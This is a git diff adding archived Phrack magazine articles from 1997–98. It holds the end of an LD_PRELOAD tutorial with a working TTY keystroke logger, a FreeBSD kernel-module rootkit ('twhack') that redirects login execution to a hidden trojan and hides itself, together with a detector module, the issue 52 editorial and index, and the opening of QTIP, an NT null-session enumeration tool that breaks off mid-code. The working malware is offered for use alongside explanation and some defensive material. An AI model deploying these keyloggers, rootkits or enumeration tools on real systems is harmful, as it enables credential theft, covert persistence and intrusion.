+libraries are designed to let you share code segments among programs.  In this 
+way, memory usage is reduced significantly.  Since code segments generally are 
+not modified, this sharing scheme works rather well.  Obviously for this to 
+work, the code segments have to be location independent or PC indepenant (ip 
+independant for the x86 programmers in the audience).
+
+   Now, since the telnetd environment variable hole, most of you know there 
+are several environment variables that can be used to specify alternate shared 
+libraries.  Among them, on most systems, are LD_LIBRARY_PATH and LD_PRELOAD; 
+this article strictly deals with the latter.  Additionally, on Digital UNIX 
+and Irix, this variable is called _RLD_LIST and has a slightly different 
+syntax.
+
+Sun's shared libraries came with an API to let users load and call shared 
+library functions; most other vendors have cloned the interface.  Oddly enough,
+our code will not work in SunOS, although it will in Solaris2.  Anyhow, the 
+first function to be concerned with is called dlopen().  This function 
+basically loads the shared library and mmap()s it into memory if it is not 
+already loaded.  The first argument it accepts, is a pointer to the filename 
+to be loaded, the second argument should usually be 1 (although some platforms 
+seem to support other options).  The manpage provides more details.  A handle 
+is returned on success, you can call dlerror() to determine if a failure 
+occurred.
+
+Once you have dlopen()ed a library, the next goal is to get the address of one 
+or more of the symbols that are inside the library.  You do this with the 
+dlsym() function.  Unfortunately, this is where things can get nonportable.
+On the freely available 4.4BSD machines I tested, dlsym() wants the function 
+name prepended by a underscore character.  This makes perfect sense to me, 
+since that is how C stores function names internally.  The System Vish 
+implementations, which make up the majority of the tested systems, do not use 
+such a convention.  This, unfortunately, means you must use conditional 
+compilation in order to ensure portability.
+
+A simple example of opening a library, getting a function and calling it is 
+shown below:
+
+<++> sh_lib_redir_example.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <dlfcn.h>
+
+main()
+{
+	void *handle;
+	void (*helloworld)(void);
+	char *c;
+
+	handle = dleopen("/tmp/helloworld.so", 1);
+	c = dlerror();
+	if(c)
+	{
+		fprintf(stderr, "couldnt open /tmp/helloworld.so\n");
+		abort();
+	}
+#if __FreeBSD__
+	helloworld = dlsym(handle, "_helloworld");
+#else
+	helloworld = dlsym(handle, "helloworld");
+#endif
+	c = dlerror();
+	if(c)
+	{
+		fprintf(stderr, "couldnt get helloworld symbol\n");
+		abort();
+	}
+	helloworld();
+	dlclose(handle);
+}
+<-->
+
+Okay, now that we understand how to use the programming interface, how do we 
+do function call redirection?  Well, my idea is simple; you preload a library, 
+the preloaded library does its thing, then it dlopen()s the real library and 
+gets the symbol and calls it.  This seems to work well on Solaris, Linux (ELF),
+Irix (5.3 and 6.2), FreeBSD (see bugs section below), and OSF/1 (not tested).
+
+Compiling shared libraries is a little different on each platform.  The 
+compilation stage is basically the same, it is the linking that is actually 
+different.  For GCC, you make the object with something like:
+
+    gcc -fPIC -c file.c
+
+That will create file.o, object code which is suitable for dynamic linking.
+Then you actually have to link it, which is where the fun begins :).  Here is 
+a chart for linking in the various operating systems I have tested this stuff
+on.
+
+FreeBSD:        ld -Bshareable -o file.so file.o
+Solaris:        ld -G -o file.so file.o -ldl
+Linux:          ld -Bshareable -o file.so file.o -ldl
+IRIX:           ld -shared -o file.so file.o
+OSF/1:          ld -shared -o file.so file.o
+
+On IRIX, there is an additional switch you need to use if you are running 6.2,
+it enables backwards ld compatibility; the manpage for ld is your guide.
+
+Unfortunately, all is not happy in the world of shared libs since there are 
+bugs present in some implementations.  FreeBSD in particular has a bug in that 
+if you dlsym() something and it is not found, it will not set the error so 
+dlerror() will return NULL.  OpenBSD is far far worse (*sigh*).  It 
+initializes the error to a value, and does not clear the error when you call 
+dlerror() so at all times, dlerror() will return non NULL. Of course, OpenBSD 
+is incompatible with our methods in other ways too, so it does not really 
+matter I guess :).  The FreeBSD bug is hacked around by testing return values
+for NULL.
+
+Here is a simple TTY logger shared library example.  When you preload it, it 
+will log the keystrokes when users run any nonprivledged shared lib using 
+program.  It stores the logs in /tmp/UID_OF_USER.  Pretty simple stuff.
+
+<++> tty_logger.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/uio.h>
+#include <sys/stat.h>
+#include <string.h>
+#include <fcntl.h>
+#include <dlfcn.h>
+
+/* change this to point to your libc shared lib path */
+#define LIB_PATH "/usr/lib/libc.so.3.0"
+#define LOGDIR "/tmp"
+int logfile = -1;
+
+static void createlog(void)
+{
+	char buff[4096];
+	if(logfile != -1)
+		return;
+	memset(buff, 0, 4096);
+	if(strlen(LOGDIR) > 4000)
+		return;
+	sprintf(buff, "%s/%d", LOGDIR, getuid());
+	logfile = open(buff, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
+	return;
+}
+
+static void writeout(char c)
+{
+	switch(c)
+	{
+		case '\n':
+		case '\r':
+			c = '\n';
+			write(logfile, &c, 1);
+			break;
+		case 27:
+			break;
+		default:
+			write(logfile, &c, 1);
+	}
+}
+
+ssize_t read(int fd, void *buf, size_t nbytes)
+{
+	void *handle;
+	ssize_t (*realfunc)(int, void *, size_t);
+	int result;
+	int i;
+	char *c;
+	char d;
+
+	handle = dlopen(LIB_PATH, 1);
+	if(!handle)
+		return -1;
+#if __linux__ || (__svr4__ && __sun__) || sgi || __osf__
+	realfunc = dlsym(handle, "read");
+#else
+	realfunc = dlsym(handle, "_read");
+#endif
+	if(!realfunc)
+		return -1;
+	if(logfile < 0)
+		createlog();
+	result = realfunc(fd, buf, nbytes);
+	c = buf;
+	if(isatty(fd))
+	{
+		if(result > 0)
+			for(i=0;i < result;i++)
+			{
+				d = c[i];
+				writeout(d);
+			}
+	}
+	return result;
+}
+<-->
+
+
+----[  EOF
+
diff --git a/phrack51/9.txt b/phrack51/9.txt
new file mode 100644
index 0000000..43ca980
--- /dev/null
+++ b/phrack51/9.txt
@@ -0,0 +1,329 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 09 of 17
+
+
+-------------------------[  Bypassing Integrity Checking Systems
+
+
+--------[  halflife <halflife@infonexus.com>
+
+
+In this day and age where intrusions happen on a daily basis and there is a
+version of "rootkit" for every operating system imaginable, even mostly
+incompetent system administration staff have begun doing checksums on their
+binaries.  For the hacker community, this is a major problem since their very 
+clever trojan programs are quickly detected and removed.  Tripwire is a very 
+popular and free utility to do integrity checking on UNIX systems.  This 
+article explores a simple method for bypassing checks done by tripwire and 
+other integrity checking programs.
+
+First off, how do integrity-checking programs work?  Well, when you first
+install them, they calculate a hash (sometimes multiple hashes) of all the
+binary files you wish to monitor.  Then, periodically, you run the checker
+and it compares the current hash with the previously recorded hash.  If the
+two differ, than something funny is going on, and it is noted.  Several 
+different algorithms exist for doing the hashes, the most popular probably 
+being the MD5 hash.
+
+In the past, there have been problems with several hashes.  MD5 has had some
+collisions, as have many other secure hash algorithms. However, exploiting the 
+collisions is still very very difficult.  The code in this article does not 
+rely on the use of a specific algorithm, rather we focus on a problem of trust 
+-- integrity checking programs need to trust the operating system, and some 
+may even trust libc.  In code that is designed to detect compromises that 
+would by their very nature require root access, you can not trust anything, 
+including your own operating system.
+
+The design of twhack had several requirements.  The first is that it need not
+require a kernel rebuild; loadable kernel modules (lkm) provided a solution
+to this.  The second is that it need be relatively stealthy.  I managed to find
+a simple way to hide the lkm in the FreeBSD kernel (probably works in OpenBSD
+and NetBSD although I have not verified this).  Once you load the module, the
+first ls type command will effectively hide the module from view.  Once hidden
+it can not be unloaded or seen with the modunload(8) command.
+
+First, a little information on FreeBSD loadable modules.  I am using the MISC 
+style of modules, which is basically similar to linux modules.  It gives you 
+pretty much full access to everything.  LKM info is stored in an array of 
+structures.  In FreeBSD 2.2.1 the array has room for 20 modules.
+
+Hiding the modules is really quite simple.  There is a used variable that 
+determines if the module slot is free or not.  When you insert a module, the 
+device driver looks for the first free module entry -- free being defined as 
+an entry with 0 in the used slot and places some info in the structure.  The 
+info is mainly used for unloading, and we are not interested in that, so it is 
+okay if other modules overwrite our structure (some might call that a feature, 
+even).
+
+Next we have to redirect the system calls we are interested in.  This is
+somewhat similar to Linux modules as well.  System calls are stored in an 
+array of structures.  The structure contains a pointer to the system call and 
+a variable specifying the number of arguments.  Obviously, all we are 
+interested in is the pointer.  First we bcopy the structure to a variable, 
+then we modify the function pointer to point to our code.  In our code we can 
+do stuff like old_function.sy_call(arguments) to call the original system call 
+-- quick and painless.
+
+Now that we know HOW to redirect system calls, which ones do we redirect in 
+order to bypass integrity checkers?  Well, there are a number of possibilities.
+You could redirect open(), stat(), and a bunch of others so that reads of your 
+modified program redirect to copies of the unmodified version.  I, however, 
+chose the opposite approach.  Execution attempts of login redirect to another 
+program, opens still go to the real login program.  Since we don't want our 
+alternative login program being detected, I also modified getdirentries so 
+that our program is never in the buffer it returns.  Similar things probably 
+should have been done with syscall 156 which is old getdirentries, but I don't 
+think it is defined and I don't know of anything using it, so it probably does 
+not really matter.
+
+Despite the attempts at keeping hidden, there are a few ways to detect this 
+code.  One of the ways of detecting (and stopping) the code is provided.
+It is a simple stealthy module that logs when syscall addresses change, and
+reverses the changes.  This will stop the twhack module as provided, but is
+FAR from perfect.
+
+What the checking code does is bcopy() the entire sysent array into a local
+copy.  Then it registers an at_fork() handler and in the handler it checks
+the current system call table against the one in memory, if they differ it
+logs the differences and changes the entry back.
+
+<++> twhack/Makefile
+CC=gcc
+LD=ld
+RM=rm
+CFLAGS=-O -DKERNEL -DACTUALLY_LKM_NOT_KERNEL $(RST)
+LDFLAGS=-r
+RST=-DRESTORE_SYSCALLS
+
+all: twhack syscheck
+
+twhack: 
+	$(CC) $(CFLAGS) -c twhack.c
+	$(LD) $(LDFLAGS) -o twhack_mod.o twhack.o
+	@$(RM) twhack.o
+
+syscheck:
+	$(CC) $(CFLAGS) -c syscheck.c
+	$(LD) $(LDFLAGS) -o syscheck_mod.o syscheck.o
+	@$(RM) syscheck.o
+clean:
+	$(RM) -f *.o 
+<-->
+<++> twhack/twhack.c
+/*
+** This code is a simple example of bypassing Integrity checking
+** systems in FreeBSD 2.2. It has been tested in 2.2.1, and
+** believed to work (although not tested) in 3.0.
+**
+** Halflife <halflife@infonexus.com>
+*/
+
+/* change these */
+#define ALT_LOGIN_PATH "/tmp/foobar"
+#define ALT_LOGIN_BASE "foobar"
+
+/* includes */
+#include <sys/param.h>
+#include <sys/ioctl.h>
+#include <sys/proc.h>
+#include <sys/systm.h>
+#include <sys/sysproto.h>
+#include <sys/conf.h>
+#include <sys/mount.h>
+#include <sys/exec.h>
+#include <sys/sysent.h>
+#include <sys/lkm.h>
+#include <a.out.h>
+#include <sys/file.h>
+#include <sys/errno.h>
+#include <sys/syscall.h>
+#include <sys/dirent.h>
+
+/* storage for original execve and getdirentries syscall entries */
+static struct sysent old_execve;
+static struct sysent old_getdirentries;
+
+/* prototypes for new execve and getdirentries functions */
+int new_execve __P((struct proc *p, void *uap, int retval[]));
+int new_getdirentries __P((struct proc *p, void *uap, int retval[]));
+
+/* flag used for the stealth stuff */
+static int hid=0;
+
+/* table we need for the stealth stuff */
+static struct lkm_table *table;
+
+/* misc lkm */
+MOD_MISC(twhack);
+
+/*
+** this code is called when we load or unload the module. unload is
+** only possible if we initialize hid to 1
+*/
+static int
+twhack_load(struct lkm_table *l, int cmd)
+{
+	int err = 0;
+	switch(cmd)
+	{
+		/*
+		** save execve and getdirentries system call entries
+		** and point function pointers to our code
+		*/
+		case LKM_E_LOAD:
+			if(lkmexists(l))
+				return(EEXIST); 
+			bcopy(&sysent[SYS_execve], &old_execve, sizeof(struct sysent));
+			sysent[SYS_execve].sy_call = new_execve;
+			bcopy(&sysent[SYS_getdirentries], &old_getdirentries, sizeof(struct sysent));
+			sysent[SYS_getdirentries].sy_call = new_getdirentries;
+			table = l;
+			break;
+		/* restore syscall entries to their original condition */
+		case LKM_E_UNLOAD:
+			bcopy(&old_execve, &sysent[SYS_execve], sizeof(struct sysent));
+			bcopy(&old_getdirentries, &sysent[SYS_getdirentries], sizeof(struct sysent));
+			break;
+		default:
+			err = EINVAL;
+			break;
+	}
+	return(err);
+}
+
+/* entry point to the module */
+int
+twhack_mod(struct lkm_table *l, int cmd, int ver)
+{
+	DISPATCH(l, cmd, ver, twhack_load, twhack_load, lkm_nullcmd);
+}
+
+/*
+** execve is simple, if they attempt to execute /usr/bin/login
+** we change fname to ALT_LOGIN_PATH and then call the old execve
+** system call.
+*/
+int
+new_execve(struct proc *p, void *uap, int  *retval)
+{
+	struct execve_args *u=uap;
+
+	if(!strcmp(u->fname, "/usr/bin/login"))
+		strcpy(u->fname, ALT_LOGIN_PATH);
+	return old_execve.sy_call(p, uap, retval);
+}
+
+/*
+** in getdirentries() we call the original syscall first
+** then nuke any occurance of ALT_LOGIN_BASE. ALT_LOGIN_PATH
+** and ALT_LOGIN_BASE should _always_ be modified and made
+** very obscure, perhaps with upper ascii characters.
+*/
+int
+new_getdirentries(struct proc *p, void *uap, int *retval)
+{
+	struct getdirentries_args *u=uap;
+	struct dirent *dep;
+	int nbytes;
+	int r,i;
+
+	/* if hid is not set, set the used flag to 0 */
+	if(!hid)
+	{
+		table->used = 0;
+		hid++;
+	}
+	r = old_getdirentries.sy_call(p, uap, retval);
+	nbytes = *retval;
+	while(nbytes > 0)
+	{
+		dep = (struct dirent *)u->buf;
+		if(!strcmp(dep->d_name, ALT_LOGIN_BASE))
+		{
+			i = nbytes - dep->d_reclen;
+			bcopy(u->buf+dep->d_reclen, u->buf, nbytes-dep->d_reclen);
+			*retval = i;
+			return r;
+		}
+		nbytes -= dep->d_reclen;
+		u->buf += dep->d_reclen;
+	}
+	return r;
+}
+<-->
+<++> twhack/syscheck.c
+#include <sys/param.h>
+#include <sys/ioctl.h>
+#include <sys/proc.h>
+#include <sys/systm.h>
+#include <sys/sysproto.h>
+#include <sys/conf.h>
+#include <sys/mount.h>
+#include <sys/exec.h>
+#include <sys/sysent.h>
+#include <sys/lkm.h>
+#include <a.out.h>
+#include <sys/file.h>
+#include <sys/errno.h>
+#include <sys/syscall.h>
+#include <sys/dirent.h>
+
+static int hid=0;
+static struct sysent table[SYS_MAXSYSCALL];
+static struct lkm_table *boo;
+MOD_MISC(syscheck);
+void check_sysent(struct proc *, struct proc *, int);
+
+static int
+syscheck_load(struct lkm_table *l, int cmd)
+{
+	int err = 0;
+	switch(cmd)
+	{
+		case LKM_E_LOAD:
+			if(lkmexists(l))
+				return(EEXIST); 
+			bcopy(sysent, table, sizeof(struct sysent)*SYS_MAXSYSCALL);
+			boo=l;
+			at_fork(check_sysent);
+			break;
+		case LKM_E_UNLOAD:
+			rm_at_fork(check_sysent);
+			break;
+		default:
+			err = EINVAL;
+			break;
+	}
+	return(err);
+}
+
+int
+syscheck_mod(struct lkm_table *l, int cmd, int ver)
+{
+	DISPATCH(l, cmd, ver, syscheck_load, syscheck_load, lkm_nullcmd);
+}
+
+void
+check_sysent(struct proc *parent, struct proc *child, int flags)
+{
+	int i;
+	if(!hid)
+	{
+		boo->used = 0;
+		hid++;
+	}
+	for(i=0;i < SYS_MAXSYSCALL;i++)
+	{
+		if(sysent[i].sy_call != table[i].sy_call)
+		{
+			printf("system call %d has been modified (old: %p new: %p)\n", i, table[i].sy_call, sysent[i].sy_call);
+#ifdef RESTORE_SYSCALLS
+			sysent[i].sy_call = table[i].sy_call;
+#endif
+		}
+	}
+}
+<-->
+
+
+----[  EOF
+
diff --git a/phrack52/1.txt b/phrack52/1.txt
new file mode 100644
index 0000000..ac50f8c
--- /dev/null
+++ b/phrack52/1.txt
@@ -0,0 +1,215 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 01 of 20
+
+
+-------------------------[  P H R A C K     5 2     I N D E X
+
+
+--------[  Choose your own $PATH adventure
+
+
+
+    Whew.  You would be quite surprised at the evil wheels I had to set in
+motion in order to get this issue out.  According to Newton, a Phrack Issue
+remains at rest or continues to move in a straight line with a uniform
+velocity if there is no unbalanced force acting on it.  This issue was at rest.
+Its velocity was constant.  And there were few forces acting on it.  Anyhow,
+after many machinations it's here.  Enjoy.
+
+    I have a gripe.  Something upon which I'd like dwell for a spell.  Let's
+talk about coding aesthetic (from the C programming standpoint).  Now, this is
+not a harangue about effective coding or efficient coding, I'll save those for
+some other time (perhaps for the time when I feel I can write effective and
+efficient code proficiently enough to vituperate to those who do not).  I
+want to touch down on a few topics of visual appeal, which are overlooked so
+often.
+
+    The five major areas I will cover are indentation, brace placement,
+use of whitespace, commenting, as well as variable and function nomenclature.
+I suppose I should also mention that coding style is a personal preference
+type of thing.  There are all kinds of schools of thought out there, and all
+kinds of methodologies on how to write pretty code.  In the grand scheme of
+things, none are really any more correct than any others, except mine.
+
+    C is, for the most part, a format free programming language.  Code can be
+written with all manner of whitespace, tabs, and newlines.  The compiler
+certainly doesn't care.  The machine doesn't care.  This can be a double
+edged sword.  There is quite a bit of room for artistic interpretation.  And
+just like in real life, there is a lot of crappy art out there.
+
+    Indenting your code is a must.  Please, do this.  Indentation is here for
+one simple reason: to clearly and unequivocally define blocks of control.
+However, 8 space tabstops are overkill.  Unless you are using a 2 point font on
+a 13" screen, 4 spaces should easily define your control blocks.  This allows
+you to maintain clarity on an 80 column screen while nesting blocks of control
+much deeper then you would with 8 space tab stops.  2 space tabstop advocates
+should be shot.  However, don't let typography take over your code (ala ink
+obscuring the intent).  If you have 7 million levels of indentation, perhaps
+you should rethink your approach to tackling the problem...
+
+    Bracing has a simple solution.  The most effective use of bracing is in
+placing them on newlines so that they neatly enclose the area of control.  This
+is especially important with nested levels of control.  I know this generates
+empty lines.  Oh well.  They're free.  Blocks of control become easily visible
+and it is easy to isolate one from another.  This goes for functions as well
+as conditionals and loop structures.  I know I go against K&R here.  Oh well.
+
+    In the pursuit of clear, readable code, whitespace is your friend.  Single
+space all keywords and all variables and constants separated by commas.  It's
+a simple thing to do to drastically improve readability.  When you have a
+series of assignments, one after another, it's a nice touch to line them up on
+the closest relative 4 space boundary.  And please, no spaces between structure
+pointer operators and structure contents.
+
+    Commenting is a delicate matter.  Descriptive, concise, well written code
+shouldn't really need commenting, or at least very much of it.  But this isn't
+a rant about descriptive, concise, well written code.  If you feel the need
+to comment your code, follow a few simple rules:
+    - Keep the comment block as small as possible.
+    - Don't tab out your comment frames to line up with each other.  That's
+      just plain fucking annoying.  If you're doing that, you have too many
+      comments anyway.
+    - Commenting datatype declarations rather then the functions that
+      manipulate them is usually more helpful.
+    - If you must comment, keep your style as consistent as possible.  If the
+      commenting detracts from the readibilty of your code, you've just ponied
+      up any clarification you might have achieved with the commenting.
+
+    The major exception to these rules are file headers.  The beginning of
+source and header files should always have some descriptive information,
+including: file name, author, purpose, modification dates, etc...  These
+comment blocks should always have a simple vertical line of unobtrusive
+astricks, framed with the required forward slashes.  People using C++ style
+commenting in C programs should be drawn and quartered.
+
+    The other exception to this rule is when you are writing code specifically
+for the benefit of others.  If the code is intended to be a learning tool, 
+copious commenting is allowable.
+
+    Variable and function nomenclature should have connotation as to what their
+purpose in life is.  As short as possible while still preserving some sort of
+identity.  Descriptive names are wonderful, but don't go overboard.  Generally,
+a condensed one or two word descriptor (possiblely connected via an underscore)
+will work fine.  And please, no mixed case.  The only time uppercase characters
+should appear in C code are in symbolic constants and macros (and possibly
+strings and comments).
+
+
+    This tirade is the result of my experiences in reading and writing C code.
+In my travels as a stalwart mediocre programmer, I have progressed through many
+levels of maturity in my programming style.  Much of my old code exhibits many
+of the very things eschewed as anathema in this jeremiad.  Well, what can I
+say?  I believe that I have grown.  I am at home with the me.  This is me
+breathing.  (Tell me what movie that's from, and I will give you a Phrack
+Donut.)
+
+
+Enjoy the magazine.  It is by and for the hacking community.  Period.
+
+
+-- Editor in Chief ----------------[  route
+-- Director of Public Operations --[  dangergirl
+-- Phrack World News --------------[  disorder
+-- Werdsmith ----------------------[  loadammo
+-------- Elite -------------------->  asriel
+-- Santa vs. Jesus ----------------[  ISS vs. SNI
+-- Festively Plump ----------------[  Cartman
+-- Extra Special Thanks -----------[  No one.
+-- Official Phrack CD -------------[  FLA/Flavour of the Weak
+-- Official Phrack Drink ----------[  `The C Kilborn` (2.9 parts ketel one,
+-----------------------------------|  .1 parts tonic)
+-- Shout Outs and Thank Yous ------[  Lords of Acid, cantor, Yggdrasil,
+-----------------------------------|  snokerash, Voyager, TNO, Jeff Thompson,
+-----------------------------------|  angstrom, redragon, Rob Pike, halflife
+-- B.A. Baracus Phrack Fracas -----[  loadammo vs. Death Veggie
+-- Original flip.c author (props) -[  datagram
+-- Gas Face Given (drops) ---------[  solo, klepto
+
+Phrack Magazine V. 8, #52, January 26, 1998.  ISSN 1068-1035
+Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved.  Nothing
+may be reproduced in whole or in part without written permission from the
+editor in chief.  Phrack Magazine is made available quarterly to the public,
+free of charge.  Go nuts people.
+
+
+Subscription requests, articles, comments, whatever should be directed to:
+
+                phrackedit@phrack.com
+
+Submissions to the above email address may be encrypted with the following key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.2
+
+mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
+ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
+vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
+0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
+DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
+/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu
+Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU=
+=1iyt
+-----END PGP PUBLIC KEY BLOCK-----
+                   
+As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED.  Phrack goes out 
+plaintext.  You certainly can subscribe in plaintext.
+
+phrack:~# head -20 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of the 
+ *  editors and contributors, truthful and accurate.  When possible, all facts
+ *  are checked, all code is compiled.  However, we are not omniscient (hell,
+ *  we don't even get paid).  It is entirely possible something contained 
+ *  within this publication is incorrect in some way.  If this is the case, 
+ *  please drop us some email so that we can correct it in a future issue.  
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
+ *  entirely stupid (or illegal) things people may do with the information
+ *  contained here-in.  Phrack is a compendium of knowledge, wisdom, wit, and
+ *  sass.  We neither advocate, condone nor participate in any sort of illicit 
+ *  behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in the
+ *  article of Phrack Magazine are intellectual property of their authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+-------------------------[  T A B L E   O F   C O N T E N T S
+
+ 1 Introduction                                            Phrack Staff   12K
+ 2 Phrack Loopback                                         Phrack Staff   60K
+ 3 Line Noise                                              various        79K 
+ 4 Phrack Prophile on o0                                   Phrack Staff   07K
+ 5 Everything a hacker needs to know about getting busted  Agent Steal    72K
+ 6 Hardening the Linux Kernel                              daemon9        42K
+ 7 The Linux pingd                                         daemon9        17K
+ 8 Steganography Thumbprinting                             anonymous      35K
+ 9 On the Morality of Phreaking                            Phrack Staff   19K
+10 A Quick NT Interrogation Probe                          twitch         18K
+11 Subscriber Loop Carrier                                 voyager        48K
+12 Voice Response Systems                                  voyager        18K
+13 Pay Per View (you don't have to)                        cavalier       19K
+14 The International Crime Syndicate Association           D. Demming     20K
+15 Digital Certificates                                    Yggdrasil      14K
+16 Piercing Firewalls                                      bishnu         31K
+17 Protected mode programming and O/S development          mythrandir     76K
+18 Weakening the Linux Kernel                              plaguez        27K
+19 Phrack World News                                       Disorder       64K
+20 extract.c                                               Phrack Staff   08K
+
+                                                                         687K
+
+-----------------------------------------------------------------------------
+
+    When Sen. Bob Kerrey (D-Neb.) was asked to define encryption, the results 
+were horrific.  "Well, I mean, to answer your question, I mean, encryption is 
+-- the political equivalent of encryption is you ask me a question, I give you
+an answer and you don't understand it," he managed. "I mean, I intentionally 
+garble the answer frequently.  I intentionally garble the response so that you 
+can't understand what I'm saying.  And that's -- you notice that I've got the
+ability to do that." 
+
+-----------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack52/10.txt b/phrack52/10.txt
new file mode 100644
index 0000000..48e9fbe
--- /dev/null
+++ b/phrack52/10.txt
@@ -0,0 +1,565 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 10 of 20
+
+
+-------------------------[  a Quick nT Interrogation Probe (QTIP)
+
+
+--------[  twitch <twitch@aye.net>
+
+
+----[  INTRODUCTION
+
+
+    As you probably already know, certain LanMan derivatives (most notably
+Windows NT) sport a stupid feature known as `null sessions`.  Null sessions
+allow server connections to be established without the hassle and rigmarole of
+username or password authentication.  This is reportedly to ease
+administrative tasks (UserManager and ilk utilize them).  Also, such silliness
+such as the RedButton bug have shown (although in poor form) that an 
+interested/malicious third party can gleen quite a bit of info from `Press any
+key to return to index`.  Once established, these connections default to having
+permissions to display enumerated user and share lists, get information about 
+particular users, wander the registry, etc.  QTIP takes advantage of this,
+allowing the user to procure far too much information about the target
+machine.  It employs no black magic or hidden technique to do this.  QTIP
+works via straight API calls.
+
+    As of service pack 3 for NT 4.0, it is possible for the `informed` system
+administrator to block null sessions through the registry, effectively
+nullifying any threat from QTIP.  I do not, however, believe that there is
+such a patch for 3.5.1 machines.  Also, it has not been tested against SAMBA
+servers, and as far as the author knows, SAMBA does not support something as
+asinine as null sessions (anyone who knows any differently is invited to mail
+corrections to the author, or directly to Phrack Magazine).
+
+    To prevent these sorts of shenanigans from happening remotely across the
+Internet, the concerned system administrator can block NBT traffic at the
+gateway (this sort of traffic should not be allowed to/from the Internet as
+standard fare).  If you are running NT 4.0, install the service packs, and set
+the appropriate registry values to disable the attack.  Or use OpenBSD.
+
+
+----[  THE CODE
+
+
+    QTIP has a few options.  qtip -h supplies the following info:
+
+usage qtip[asug<username>hv] <target>
+        -s:             get share list
+        -u:             get user list
+        -g <username>:  get infos about <username>
+        -d:             leave connection established on exit
+        -a:             -s + -u
+        -h, -?:         display this help
+        -v:             be verbose (use twice to be garrulous)
+
+    Seems rather self explanatory.  If the verbose flag is set, then -u
+implies a recursive -g.  -d is handy if you plan to take a look at the
+registry as well (there's gold in them thar hills).  Omission of all flags just
+establishes a null session and exits.  <target> can be a fully-qualified
+domain name, ip address, or UNC format.  The code compiles like a dream under
+visual c 4.1.  There is no makefile included, just link the code against 
+kernel32.lib, libc.lib and wsock32.lib.  This program is most useful wrapped 
+in scripts with something like tping(ip sweeper), and maybe a few registry
+inquisition perl scripts.  Feel free to redistribute, just give props where
+props are due, and please let me know if you make any interesting changes.
+
+<++> qtip/qtip.h
+/*
+ * qtip.h
+ * 12/04/1997
+ * twitch
+ * twitch@aye.net
+ *
+ * a quick nt investigative probe. (mis)uses null sessions to collect
+ * sundry information about a WindowsNT server.  distribute as you
+ * please.  be alert, look alive, and act like you kow.
+ *
+ * '...i should dismiss him, in order to teach him that pleasure consists
+ *     not in what i enjoy, but in having my own way.'
+ *       -sk, either/or
+ */
+
+#include <stdio.h>
+#include <windows.h>
+#include <winsock.h>
+#include "lm.h"
+
+#define k16             16384
+#define TARG_LEN        255
+#define USER_LEN        22
+
+void handle_error(DWORD);
+void prepend_str(char *, char*);
+int  open_session();
+int  procure_userlist();
+int  procure_sharelist();
+void parse_cl(int, char **);
+void usage(char *);
+int powerup(int, char **);
+void bail(const char *);
+int  close_session();
+void get_usr_info(wchar_t *);
+
+/* couple o globals to make my life easier */
+u_int           OPT_SHARES, OPT_USERS, OPT_GETUI;
+u_int           OPT_NODEL,  VERB;
+char            target[TARG_LEN];
+WCHAR           utarg[TARG_LEN];
+WCHAR           user[USER_LEN];
+NETRESOURCE     nr;
+
+<-->
+<++> qtip/qtip.c
+
+/*
+ * qtip.c
+ * 10/04/1997
+ * twitch
+ * twitch@aye.net
+ *
+ * a quick nt investigative probe
+ * link against kernel32.lib, libc.lib and wsock32.lib.
+ * qtip -h for usage.  distribute as you please.
+ *
+ */
+
+#include "qtip.h"
+
+int main(int argc, char *argv[])
+{
+   if( (powerup(argc, argv)) )
+      return(1);
+
+   if( (open_session()) != 0)
+      return(1);
+
+   if(OPT_SHARES)
+      procure_sharelist();
+
+   if(OPT_USERS)
+      procure_userlist();
+
+   if(OPT_GETUI)
+      get_usr_info(utarg);
+
+        close_session();
+   return(0);
+}
+
+int open_session()
+{
+   DWORD                        r;
+
+   nr.dwType    = RESOURCETYPE_ANY;
+   nr.lpLocalName       = NULL;
+   nr.lpProvider        = NULL;
+   nr.lpRemoteName = target;
+
+   if(VERB)
+      printf("establishing null session with %s...\n", target);
+
+   r = WNetAddConnection2(&nr, "", "", 0);
+   if(r != NO_ERROR){
+      handle_error(r);
+      return -1;
+   }
+
+   if(VERB)
+     printf("connection established\n");
+
+   return 0;
+}
+
+/*
+ * procure_userlist()
+ *    just use the old lm NetUserEnum() because there isnt comparable
+ *    functionality in the WNet sect.  i just wish the win32 api was
+ *    more bloated and obtuse.
+ */
+int procure_userlist()
+{
+   NET_API_STATUS               nas;
+   LPBYTE                               *buf = NULL;
+   DWORD                                        entread, totent, rhand;
+   DWORD                                        maxlen = 0xffffffff;
+   USER_INFO_0                  *usrs;
+   unsigned int    i;
+   int                                  cc = 0;
+
+   entread = totent = rhand = nas = 0;
+   if( (buf = (LPBYTE*)malloc(k16)) == NULL)
+                bail("malloc probs\n");
+
+   if(VERB)
+     wprintf(L"\ngetting userlist from %s...\n", utarg);
+
+   nas = NetUserEnum(utarg, 0, 0, buf, maxlen, &entread, &totent, &rhand);
+   if(nas != NERR_Success){
